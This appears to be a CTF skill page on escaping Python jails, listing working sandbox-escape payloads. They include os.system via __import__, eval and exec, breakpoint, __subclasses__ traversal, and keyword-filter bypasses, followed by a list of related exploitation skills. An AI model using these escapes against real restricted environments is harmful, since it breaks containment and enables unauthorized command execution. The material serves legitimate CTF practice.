pyjail
Python Jail Escape Skill
Quick Workflow
Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag
Quick Reference - Common Escapes
# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")
# Using breakpoint (Python 3.7+)
breakpoint() # Drops into pdb, then !cat flag.txt
# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')
# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
Reference Files
| Topic | Reference |
|---|---|
| Bypass Techniques | reference/bypass.md |
| Complete Payloads | reference/payloads.md |
Quick Debugging
# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
if 'wrap' in str(c): print(i, c)
# Check available builtins
dir(__builtins__)
More from kiwamizamurai/cctf
web-security
Exploits web application vulnerabilities. Use when working with SQL injection, XSS, SSRF, SSTI, command injection, path traversal, authentication bypass, deserialization, or any web-based CTF challenge.
30mobile-security
Reverses and exploits mobile applications. Use when working with Android APK files, iOS IPA files, mobile app reversing, Frida hooking, or app security analysis challenges.
28osint
Gathers intelligence from public sources. Use when searching for usernames, geolocating images, investigating social media, analyzing domains, or solving information gathering challenges.
19networking
Analyzes network traffic and exploits protocols. Use when working with PCAP files, Wireshark captures, packet analysis, protocol exploitation, traffic forensics, or data exfiltration detection.
7crypto-analysis
Breaks cryptographic systems and decrypts ciphertext. Use when working with RSA, AES, XOR, classical ciphers, hash functions, or when challenge involves encryption, decryption, keys, or mathematical crypto attacks.
7binary-analysis
Analyzes binary files for vulnerabilities and develops exploits. Use when working with ELF/PE executables, pwn challenges, buffer overflow, heap exploitation, ROP chains, format string bugs, or shellcode development.
7